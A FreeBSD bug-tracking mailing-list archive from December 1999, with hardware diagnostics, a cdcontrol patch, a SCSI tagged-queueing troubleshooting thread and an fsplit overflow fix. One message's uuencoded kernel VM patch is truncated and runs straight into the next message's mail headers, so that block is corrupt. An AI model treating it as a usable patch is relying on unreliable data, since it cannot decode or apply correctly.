bohica:/home/klh# -------------------- bohica:/home/klh# camcontrol modepage -u 0 -m 10 RLEC: 0 Queue Algorithm Modifier: 0 QErr: 0 DQue: 0 EECA: 0 RAENP: 0 UAAENP: 0 EAENP: 0 Ready AEN Holdoff Period: 0 bohica:/home/klh# camcontrol modepage -u 1 -m 10 RLEC: 0 Queue Algorithm Modifier: 1 QErr: 0 DQue: 0 EECA: 0 RAENP: 0 UAAENP: 0 EAENP: 0 Ready AEN Holdoff Period: 0 bohica:/home/klh# camcontrol modepage -u 2 -m 10 RLEC: 0 Queue Algorithm Modifier: 0 QErr: 0 DQue: 0 EECA: 0 RAENP: 0 UAAENP: 0 EAENP: 0 Ready AEN Holdoff Period: 0 bohica:/home/klh# camcontrol modepage -u 3 -m 10 RLEC: 1 Queue Algorithm Modifier: 1 QErr: 0 DQue: 0 EECA: 0 RAENP: 0 UAAENP: 0 EAENP: 0 Ready AEN Holdoff Period: 0 bohica:/home/klh# -------------------- DMESG OUTPUT: Copyright (c) 1992-1999 FreeBSD Inc. Copyright (c) 1982, 1986, 1989, 1991, 1993 The Regents of the University of California. All rights reserved. FreeBSD 3.1-RELEASE #16: Sun Dec 12 00:56:35 PST 1999 klh@pcklh:/usr/src/sys/compile/JUMPGATE Timecounter "i8254" frequency 1193182 Hz Timecounter "TSC" frequency 66668362 Hz CPU: Pentium/P5 (66.67-MHz 586-class CPU) Origin = "GenuineIntel" Id = 0x517 Stepping=7 Features=0x1bf real memory = 33554432 (32768K bytes) avail memory = 29855744 (29156K bytes) Bad BIOS32 Service Directory! Preloaded elf kernel "kernel" at 0xf02e8000. eisa0: Probing for devices on the EISA bus Probing for devices on PCI bus 0: chip0: rev 0x03 on pci0.0.0 lnc1: rev 0x02 int b irq 10 on pci0.11.0 lnc1: PCnet-32 VL-Bus address 00:80:5f:e4:96:18 amd0: rev 0x02 int a irq 11 on pci0.12.0 vga0: rev 0x00 int a irq 255 on pci0.13.0 chip1: rev 0x03 on pci0.15.0 Probing for devices on the ISA bus: sc0 on isa sc0: VGA color <16 virtual consoles, flags=0x0> ed0 at 0x310-0x31f irq 9 maddr 0xdc000 msize 8192 on isa ed0: address 02:60:8c:3e:56:b0, type 3c503 (8 bit) atkbdc0 at 0x60-0x6f on motherboard atkbd0 irq 1 on isa psm0 irq 12 on isa psm0: model Generic PS/2 mouse, device ID 0 sio0 at 0x3f8-0x3ff irq 4 flags 0x10 on isa sio0: type 16550A sio1 at 0x2f8-0x2ff irq 3 on isa sio1: type 16550A fdc0 at 0x3f0-0x3f7 irq 6 drq 2 on isa fdc0: FIFO enabled, 8 bytes threshold fd0: 1.44MB 3.5in ppc0 at 0x378 irq 7 on isa ppc0: Generic chipset (NIBBLE-only) in COMPATIBLE mode nlpt0: on ppbus 0 nlpt0: Interrupt-driven port ppi0: on ppbus 0 plip0: on ppbus 0 2 3C5x9 board(s) on ISA found at 0x300 0x320 ep0 at 0x300-0x30f irq 5 on isa ep0: aui/utp[*AUI*] address 00:20:af:34:5f:af ep1 at 0x320-0x32f irq 15 on isa ep1: aui/bnc[*AUI*] address 00:60:97:09:40:7c vga0 at 0x3b0-0x3df maddr 0xa0000 msize 131072 on isa npx0 on motherboard npx0: INT 16 interface Intel Pentium detected, installing workaround for F00F bug IP packet filtering initialized, divert enabled, rule-based forwarding enabled, logging limited to 1000 packets/entry Waiting 5 seconds for SCSI devices to settle changing root device to da0s1a da1 at amd0 bus 0 target 1 lun 0 da1: Fixed Direct Access SCSI-2 device da1: 10.0MB/s transfers (10.0MHz, offset 15) da1: 511MB (1046532 512 byte sectors: 64H 32S/T 511C) da0 at amd0 bus 0 target 0 lun 0 da0: Fixed Direct Access SCSI-2 device da0: 10.0MB/s transfers (10.0MHz, offset 15), Tagged Queueing Enabled da0: 2048MB (4194995 512 byte sectors: 255H 63S/T 261C) da3 at amd0 bus 0 target 3 lun 0 da3: Fixed Direct Access SCSI-2 device da3: 10.0MB/s transfers (10.0MHz, offset 15) da3: 2029MB (4157201 512 byte sectors: 255H 63S/T 258C) da2 at amd0 bus 0 target 2 lun 0 da2: Fixed Direct Access SCSI-2 device da2: 10.0MB/s transfers (10.0MHz, offset 15) da2: 2048MB (4194995 512 byte sectors: 255H 63S/T 261C) -------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 3:40: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4135E14FC8 for ; Tue, 14 Dec 1999 03:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA01478; Tue, 14 Dec 1999 03:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from escudo.nhh.no (escudo.nhh.no [158.37.96.28]) by hub.freebsd.org (Postfix) with ESMTP id D9C4814C19 for ; Tue, 14 Dec 1999 03:33:37 -0800 (PST) (envelope-from itkas@escudo.nhh.no) Received: (from itkas@localhost) by escudo.nhh.no (8.9.3/8.9.3) id MAA24537; Tue, 14 Dec 1999 12:33:35 +0100 (CET) Message-Id: <199912141133.MAA24537@escudo.nhh.no> Date: Tue, 14 Dec 1999 12:33:35 +0100 (CET) From: kas@kas.no (Knut A. Syed) To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/15480: Change-request for /usr/src/usr.sbin/cdcontrol/ Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15480 >Category: misc >Synopsis: Change-request for /usr/src/usr.sbin/cdcontrol/ >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 14 03:40:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Knut A. Syed >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: >Description: Attached is a patch to make cdcontrol(1) a bit easier to use. The volume-command is modified. If used with only one parameter it sets both channels. If used without parameters it will print volume-info. ~kas >How-To-Repeat: >Fix: diff -crN cdcontrol.orig/cdcontrol.1 cdcontrol/cdcontrol.1 *** cdcontrol.orig/cdcontrol.1 Mon Dec 13 21:56:21 1999 --- cdcontrol/cdcontrol.1 Mon Dec 13 21:32:26 1999 *************** *** 104,109 **** --- 104,119 ---- .It Cm close Inject the disc. + .It Cm volume + Same as + .Em status volume + command. + + .It Cm volume Ar level + Set the volume of both channels to + .Ar level . + Allowed values are in the range 0-255. + .It Cm volume Ar left_channel Ar right_channel Set the volume of left channel to .Ar left_channel diff -crN cdcontrol.orig/cdcontrol.c cdcontrol/cdcontrol.c *** cdcontrol.orig/cdcontrol.c Mon Dec 13 21:56:21 1999 --- cdcontrol/cdcontrol.c Mon Dec 13 21:47:11 1999 *************** *** 16,21 **** --- 16,27 ---- * 11-Oct-1995: Serge V.Vakulenko * New eject algorithm. * Some code style reformatting. + * + * 1999-12-13: Knut A. Syed + * Version 2.0.1. + * Volume-command modified. If used with only one + * parameter it now sets both channels. If used without + * parameters it will print volume-info. */ #ifndef lint *************** *** 34,40 **** #include #include ! #define VERSION "2.0" #define ASTS_INVALID 0x00 /* Audio status byte not valid */ #define ASTS_PLAYING 0x11 /* Audio play operation in progress */ --- 40,46 ---- #include #include ! #define VERSION "2.0.1" #define ASTS_INVALID 0x00 /* Audio status byte not valid */ #define ASTS_PLAYING 0x11 /* Audio play operation in progress */ *************** *** 92,98 **** { CMD_SET, "set", 2, "msf | lba" }, { CMD_STATUS, "status", 1, "[audio | media | volume]" }, { CMD_STOP, "stop", 3, "" }, ! { CMD_VOLUME, "volume", 1, " | left | right | mute | mono | stereo" }, { 0, } }; --- 98,104 ---- { CMD_SET, "set", 2, "msf | lba" }, { CMD_STATUS, "status", 1, "[audio | media | volume]" }, { CMD_STOP, "stop", 3, "" }, ! { CMD_VOLUME, "volume", 1, " | | left | right | mute | mono | stereo" }, { 0, } }; *************** *** 239,245 **** int run (int cmd, char *arg) { ! int l, r, rc; switch (cmd) { --- 245,251 ---- int run (int cmd, char *arg) { ! int l, r, rc, count; switch (cmd) { *************** *** 349,354 **** --- 355,363 ---- if (fd < 0 && !open_cd ()) return (0); + if (strlen(arg) == 0) + return pstatus ("volume"); + if (! strncasecmp (arg, "left", strlen(arg))) return ioctl (fd, CDIOCSETLEFT); *************** *** 364,375 **** if (! strncasecmp (arg, "mute", strlen(arg))) return ioctl (fd, CDIOCSETMUTE); ! if (2 != sscanf (arg, "%d %d", &l, &r)) { warnx("invalid command arguments"); return (0); } - - return setvol (l, r); default: case CMD_HELP: --- 373,387 ---- if (! strncasecmp (arg, "mute", strlen(arg))) return ioctl (fd, CDIOCSETMUTE); ! count = sscanf (arg, "%d %d", &l, &r); ! if (count == 1) ! return setvol (l, l); ! if (count == 2) ! return setvol (l, r); ! else { warnx("invalid command arguments"); return (0); } default: case CMD_HELP: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 4:46:47 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 3560C1512D for ; Tue, 14 Dec 1999 04:46:42 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.11 #1) id 11xrLT-000Bl7-00; Tue, 14 Dec 1999 14:46:23 +0200 From: Sheldon Hearn To: Frank Mayhar Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: bin/15450: The name of the tagfile is left in the path. In-reply-to: Your message of "Mon, 13 Dec 1999 10:30:07 PST." <199912131830.KAA08580@freefall.freebsd.org> Date: Tue, 14 Dec 1999 14:46:22 +0200 Message-ID: <45204.945175582@axl.noc.iafrica.com> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 13 Dec 1999 10:30:07 PST, Frank Mayhar wrote: > I've submitted the patch to Keith Bostic; hopefully he'll integrate > it into the next version of nvi. If someone could apply the patch > to the nvi source, though, we could be a step ahead. (It's a very > simple patch, as you can see.) If you get a definite okay from Keith on an exact diff, we could incorporate it. We're usually not too keen on taking on patches that end up causing conflicts later because the author chose to do something slightly differently. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 5: 0: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AC24014EA1 for ; Tue, 14 Dec 1999 05:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA09205; Tue, 14 Dec 1999 05:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 05:00:02 -0800 (PST) Message-Id: <199912141300.FAA09205@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: bin/15471: fsplit buffer overflow fixes Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15471; it has been noted by GNATS. From: Sheldon Hearn To: kargl@troutmask.apl.washington.edu Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15471: fsplit buffer overflow fixes Date: Tue, 14 Dec 1999 14:54:59 +0200 On Mon, 13 Dec 1999 12:50:24 PST, "Steven G. Kargl" wrote: > * Whitespace clean up Can you send the diff without the whitespace changes? That's how it'd have to be committed in any case, with whitespace changes (which are discouraged) being committed seperately. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 5: 0:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 00B2E14F9C for ; Tue, 14 Dec 1999 05:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA09212; Tue, 14 Dec 1999 05:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 05:00:03 -0800 (PST) Message-Id: <199912141300.FAA09212@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ken Harrenstien Subject: Re: kern/15447: Seagate ST32550 (Barracuda 2LP) may be a broken tagged queueing drive? Reply-To: Ken Harrenstien Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15447; it has been noted by GNATS. From: Ken Harrenstien To: "Kenneth D. Merry" Cc: klh@netcom.com, freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/15447: Seagate ST32550 (Barracuda 2LP) may be a broken tagged queueing drive? Date: Tue, 14 Dec 99 4:58:33 PST > On Sun, Dec 12, 1999 at 06:40:28PM -0800, klh@netcom.com wrote: > > A separate problem is causing my system to sometimes boot up with > > tagged queueing enabled and sometimes not. I've recently been stressing > > the disk significantly more than usual and have encountered user-level > > I/O errors that I traced back to the enabling of tagged queueing. > > > > With tagged queueing off, everything always works. With it on, > > a heavy load of seeks will cause reads and writes to start failing. > > I was able to verify this by running a test case on two ST32550s, both > > on line during the same kernel boot and both identical in all respects > > except that one had tagged queueing enabled and the other didn't (the > > randomness of this enabling is a separate problem). The drive without > > tagging always works perfectly; the drive with tagging always fails > > at random places during the test. I verified that it is not specific > > to the individual drives by doing reboots until the formerly tag-enabled > > drive booted up tag-disabled -- whereupon it then performed perfectly > > again. I also verified that the filesystems were identical by doing > > a complete track-by-track copy of one to the other prior to testing. > > > > The ST32550 is not in the latest quirks table in cam_xtp.c, although > > several other Seagates are. The Barracuda 2LP was at one time fairly > > popular so I'm a little surprised this hasn't shown up before, but > > who knows. Maybe most FreeBSD users have IDE drives. > > No, there are many, many people using Seagate drives (including me) > successfully in FreeBSD systems. I think this problem is most likely > peculiar to your particular system and/or drives. Agreed. These are surplus drives that appear to be Sun OEM but those, also, are in wide use. If any of the hardware is to be suspected, I would squint at the AM53C974 or more properly its driver. Read on. > > >Fix: > > Obviously the ST32550 can be added to the quirks table in cam_xtp.c. > > I just hope this does not reflect some underlying problem with > > tagged queueing support of Seagates in general. > > Nope, it reflects a problem either with your drives or your cabling and > termination setup. I think the cabling and termination is highly unlikely to be a problem in this case; I am familiar with the SCSI requirements and use high-quality components, active termination, etc. In any case, it's only a fast-10 bus and there have been no other signs of trouble. It's *only* when the kernel thinks that tagged queueing is enabled that I start to get user-mode I/O errors, and then only when doing a lot of long-distance seeks (ie when commands would start piling up). One of the main things I've been trying to pin down is whether this problem is specific to the ST32550s or if it happens with other drives as well. Finally, after several hours far into the night of reboots with various versions and flags, I struck paydirt and enticed the system to come up with the Fujitsu M2952 TQ-enabled. Guess what? It behaves just like the ST32550s, meaning that it causes the same problems with Tagged-Queueing enabled, but works fine otherwise. I wondered if perhaps the problem might be a queue-full condition; the ST32550 manual says it can handle up to 64 commands, while the kernel default is 255 (implying it expects a QUEUE FULL response from the drive). So I tried adding a quirk entry limiting the Seagate to a maxtags of 63. No luck. Tried 32. Still no change. Now I'm using 0 which disables it altogether and things are now safe. > You need to supply some more information before we can make any sort of > guess at what is going on. So, please send (and make sure you do a "group" > reply to this mail, so it winds up in the PR database) full 'dmesg' output > from your system, including any kernel messages that have shown up while > doing your tests. > > Please don't send the output of /var/log/messages, unless it is necessary > to show problems that happened in a previous boot. The output of dmesg(8) > is easier to read. Done; see response to kern/15446. > Also, please send a description of your cabling and termination setup. #1 ---- #7 ---- #0 ---- #2 ---- #3 ---- TERM DPES amd0 ST32550 ST32550 M2952 (term) #1 internal, #0,2,3 external. Because of your statement that the ST32550 is known to work, and the fact that my Fujitsu was failing in the same way, I don't think the drives are at fault. So we're left with either the controller, or FreeBSD 3.1's support of it, or something else. The controller seems unlikely since Tagged Queueing is a higher-level protocol and there's no reason to suspect either the physical bus or the link-level protocol (otherwise many more problems would have evinced themselves). One more data point. I use the same kernel source base in another system (NCR 53c895, 3 IBM drives) where all drives are TQ-enabled and have never had problems despite much heavier usage. I'm starting to think that whatever is causing the kernel to be spastic about whether or not to use Tagged Queueing (cf kern/15446) may also be responsible for its failure to operate properly. In any case, since the ST32550 is no longer a suspect, I suggest that this bug (kern/15447) be closed and the above information made a follow-up to kern/15446. --Ken To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 5:50: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1B2761512F for ; Tue, 14 Dec 1999 05:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA12110; Tue, 14 Dec 1999 05:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 05:50:01 -0800 (PST) Message-Id: <199912141350.FAA12110@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Mitja Horvat Subject: Re: kern/15420: 3.3-RELEASE Kernel freeze Reply-To: Mitja Horvat Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15420; it has been noted by GNATS. From: Mitja Horvat To: freebsd-gnats-submit@freebsd.org, mitja@ksop-cscp.si Cc: Subject: Re: kern/15420: 3.3-RELEASE Kernel freeze Date: Tue, 14 Dec 1999 15:40:33 +0100 Hi again, in the previous post I appended the wrong patch again. Please forgive me, I have a lot of other things to do besides this ;) The patch is now uuencoded. Regards, Distracted Mitja ;) begin 644 vm-3.3-RELEASE.patch M9&EF9B`M=2!S>7,N;W)I9R]V;2]S=V%P7W!A9V5R+F,@F5C:&5C:R@I"B!["BT):68@ M*'9M7W-W87!?2X* M9&EF9B`M=2!S>7,N;W)I9R]V;2]V;5]P86=E;W5T+F,@F4@/3T@,"!\?"!S=V%P7W!A9V5R7V9U;&PI("8F"BT)("`@("@H8VYT+G9? M9G)E95]C;W5N="`K(&-N="YV7V-A8VAE7V-O=6YT*2`\(&-N="YV7V9R965? M;6EN*2D@>PHK"6EF("AV;5]S=V%P7W-I>F4@/3T@,"`F)@HK"2`@("`H8VYT M+G9?9G)E95]C;W5N="`K(&-N="YV7V-A8VAE7V-O=6YT*2`\(&-N="YV7V9R M965?;6EN('Q\(`HK"2`@("!S=V%P7W!A9V5R7V9U;&PI('L*(`D)8FEG<')O M8R`]($Y53$P["B`)"6)I9W-I>F4@/2`P.PH@"0EF;W(@*'`@/2!A;&QP2AB:6=P; Tue, 14 Dec 1999 06:13:52 -0800 (PST) (envelope-from sjr@home.net) Received: from istari.home.net (localhost.home.net [127.0.0.1]) by cc158233-a.catv1.md.home.com (8.9.3/8.9.3) with ESMTP id JAA04522 for ; Tue, 14 Dec 1999 09:13:45 -0500 (EST) (envelope-from sjr@cc158233-a.catv1.md.home.com) Message-Id: <199912141413.JAA04522@cc158233-a.catv1.md.home.com> Date: Tue, 14 Dec 1999 09:13:44 -0500 (EST) From: "Stephen J. Roznowski" Subject: Problem building -current (gnu/usr.bin/binutils/doc) To: freebsd-bugs@FreeBSD.ORG MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org When I try to rebuild -current (source updated within the last day or so), I get the following error: ... gzip -cn annotate.info > annotate.info.gz ln -sf /usr/src/gnu/usr.bin/binutils/doc/../../../../contrib/gdb/gdb/doc/all-cfg.texi gdb-cfg.texi cp /usr/src/gnu/usr.bin/binutils/doc/../../../../contrib/libreadline/doc/hsuser.texinfo inc-hist.texi patch -b .orig < /usr/src/gnu/usr.bin/binutils/doc/inc-hist.diff patch: **** can't find file `.orig' : No such file or directory *** Error code 2 Stop in /usr/src/gnu/usr.bin/binutils/doc. *** Error code 1 ... Looking in the binutils/doc directory, I don't see a file called ".orig". What am I doing wrong? Thanks, -SR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 6:21:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from caspian.plutotech.com (caspian.plutotech.com [206.168.67.80]) by hub.freebsd.org (Postfix) with ESMTP id 58D9E151D3 for ; Tue, 14 Dec 1999 06:20:50 -0800 (PST) (envelope-from gibbs@caspian.plutotech.com) Received: from caspian.plutotech.com (localhost [127.0.0.1]) by caspian.plutotech.com (8.9.3/8.9.1) with ESMTP id HAA01060; Tue, 14 Dec 1999 07:19:31 -0700 (MST) (envelope-from gibbs@caspian.plutotech.com) Message-Id: <199912141419.HAA01060@caspian.plutotech.com> X-Mailer: exmh version 2.1.0 09/18/1999 To: Ken Harrenstien Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/15448: Would be nice if the kernel could detect/report problems with SCSI tagged queueing In-reply-to: Your message of "Tue, 14 Dec 1999 00:40:03 PST." <199912140840.AAA86542@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 14 Dec 1999 07:19:31 -0700 From: "Justin T. Gibbs" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I know about (and like) -v, but it doesn't make any difference. Which > is to say, there is no error output either way. Just user-level I/O > errors except when a page transfer fails, in which case the pager code > then complains. Never the CAM subsystem. What kind of controller are you using? What happens when you run something more up-to-date than 3.1R? -- Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 6:24:39 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from caspian.plutotech.com (caspian.plutotech.com [206.168.67.80]) by hub.freebsd.org (Postfix) with ESMTP id B7CE514C48 for ; Tue, 14 Dec 1999 06:24:26 -0800 (PST) (envelope-from gibbs@caspian.plutotech.com) Received: from caspian.plutotech.com (localhost [127.0.0.1]) by caspian.plutotech.com (8.9.3/8.9.1) with ESMTP id HAA01080; Tue, 14 Dec 1999 07:24:23 -0700 (MST) (envelope-from gibbs@caspian.plutotech.com) Message-Id: <199912141424.HAA01080@caspian.plutotech.com> X-Mailer: exmh version 2.1.0 09/18/1999 To: Ken Harrenstien Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/15446: Unpredictable enabling of SCSI Tagged Queueing In-reply-to: Your message of "Tue, 14 Dec 1999 02:30:02 PST." <199912141030.CAA95100@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 14 Dec 1999 07:24:23 -0700 From: "Justin T. Gibbs" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > amd0: . > rev 0x02 int a irq 11 on pci0.12.0 This is your problem. The driver supplied by Tekram had several little problems in it. In -current and -stable, there is a driver that has received a few cleanup passes and hopefully addresses these problems. -- Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 7:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C542C14CFA for ; Tue, 14 Dec 1999 07:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA75678; Tue, 14 Dec 1999 07:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 07:50:02 -0800 (PST) Message-Id: <199912141550.HAA75678@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Matthew Seaman Subject: Re: bin/12243: NFS re-mount from Solaris 7 server hangs Reply-To: Matthew Seaman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/12243; it has been noted by GNATS. From: Matthew Seaman To: freebsd-gnats-submit@freebsd.org, m.seaman@inpharmatica.co.uk Cc: Subject: Re: bin/12243: NFS re-mount from Solaris 7 server hangs Date: Tue, 14 Dec 1999 15:49:43 +0000 Please close PR bin/12243: I can no-longer reproduce the problem with 3.4RC. Matthew -- Certe, Toto, sentio nos in Kansate non iam adesse. Dr. Matthew Seaman, Inpharmatica Ltd, 60 Charlotte St, London, W1P 2AX Tel: +44 171 631 4644 x229 Fax: +44 171 631 4844 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 9: 6:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1C38D14FA7; Tue, 14 Dec 1999 09:06:12 -0800 (PST) (envelope-from marcel@FreeBSD.org) Received: (from marcel@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA84876; Tue, 14 Dec 1999 09:06:11 -0800 (PST) (envelope-from marcel@FreeBSD.org) Date: Tue, 14 Dec 1999 09:06:11 -0800 (PST) From: Message-Id: <199912141706.JAA84876@freefall.freebsd.org> To: marcel@FreeBSD.org, freebsd-bugs@FreeBSD.org, marcel@FreeBSD.org Subject: Re: kern/15221: Linux emulator core dumps on setreuid() Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Linux emulator core dumps on setreuid() Responsible-Changed-From-To: freebsd-bugs->marcel Responsible-Changed-By: marcel Responsible-Changed-When: Tue Dec 14 09:03:50 PST 1999 Responsible-Changed-Why: My corner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 9: 7:44 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8A576152FC; Tue, 14 Dec 1999 09:07:42 -0800 (PST) (envelope-from marcel@FreeBSD.org) Received: (from marcel@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA85030; Tue, 14 Dec 1999 09:07:42 -0800 (PST) (envelope-from marcel@FreeBSD.org) Date: Tue, 14 Dec 1999 09:07:42 -0800 (PST) From: Message-Id: <199912141707.JAA85030@freefall.freebsd.org> To: marcel@FreeBSD.org, freebsd-bugs@FreeBSD.org, marcel@FreeBSD.org Subject: Re: kern/15425: statfs and fstatfs syscall in linux emulator Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: statfs and fstatfs syscall in linux emulator Responsible-Changed-From-To: freebsd-bugs->marcel Responsible-Changed-By: marcel Responsible-Changed-When: Tue Dec 14 09:07:08 PST 1999 Responsible-Changed-Why: My take To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 11:10:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C01BD150ED for ; Tue, 14 Dec 1999 11:10:08 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA96935; Tue, 14 Dec 1999 11:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 11:10:03 -0800 (PST) Message-Id: <199912141910.LAA96935@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Steven G. Kargl" Subject: Re: bin/15471: fsplit buffer overflow fixes Reply-To: "Steven G. Kargl" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15471; it has been noted by GNATS. From: "Steven G. Kargl" To: sheldonh@uunet.co.za (Sheldon Hearn) Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15471: fsplit buffer overflow fixes Date: Tue, 14 Dec 1999 11:06:41 -0800 (PST) Once upon a time, Sheldon Hearn said: > > > On Mon, 13 Dec 1999 12:50:24 PST, "Steven G. Kargl" wrote: > > > * Whitespace clean up > > Can you send the diff without the whitespace changes? That's how it'd > have to be committed in any case, with whitespace changes (which are > discouraged) being committed seperately. * Added "include " for exit(3) prototype * Use getopt(3) instead of custom command line parser * Use dynamic memory allocation to allevaite buffer overflows * Update man page * Declare argc * Give int main() a return value of 0 -- Steve diff -r -u /usr/src/usr.bin/fsplit/fsplit.1 fsplit/fsplit.1 --- /usr/src/usr.bin/fsplit/fsplit.1 Mon Aug 30 08:00:49 1999 +++ fsplit/fsplit.1 Tue Dec 14 10:55:53 1999 @@ -39,7 +39,7 @@ .Os BSD 4.2 .Sh NAME .Nm fsplit -.Nd split a multi-routine Fortran file into individual files +.Nd split a multi-routine Fortran 77 file into individual files .Sh 